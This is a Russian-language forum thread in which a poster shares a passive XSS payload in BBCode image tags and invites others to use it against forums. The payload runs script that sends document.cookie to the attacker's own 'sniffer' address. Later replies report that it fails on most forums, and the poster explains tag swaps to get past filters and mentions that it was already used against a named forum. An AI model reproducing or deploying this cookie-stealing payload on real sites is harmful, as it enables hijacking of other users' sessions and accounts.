Короче роюсь я роюсь в своём форуме и нашёл баг- Code: [warn][img]j a v a s c r i p t:alert(/<script>img = new Image(); img.src = "адресс твоего сниффера?"+document.cookie;</script>/).jpg[/img][/warn] Если у кого он сработает и если я кому помог тогда жду +++ ! =) И кстати писать это надо прямиком в сообщение... Это пассивная Xss бага! Юзаем парни.... удачи! ================== ==================
Наврядли у кого будет это работать. Почти ва всех форумах запрещены. Я например попробывал на 5 форумах и ничего. А так поиск уязвимостей это благое дело! За старание можно поставить +)
Ребят я ж попросил что на forum.angelz.ru ненадо нечего делать! Блин ну даш для примера один форум потом расхлёбывай! (=
У меня не работает, вставляю блок с кодом, в посте появляется надпись: [warn][/warn] И это обычным текстом, не ссылкой.
Блин что за вопросы... ща объясню- [warn][/warn]- тег предупреждения - тег картинки Вся проблема в том что по стандарту в динамических страницах тег запрещены, вот поэтому работает ненавсех форумах. И ещё к примеру место тега [warn][/warn] мона подставить тег [info][/info]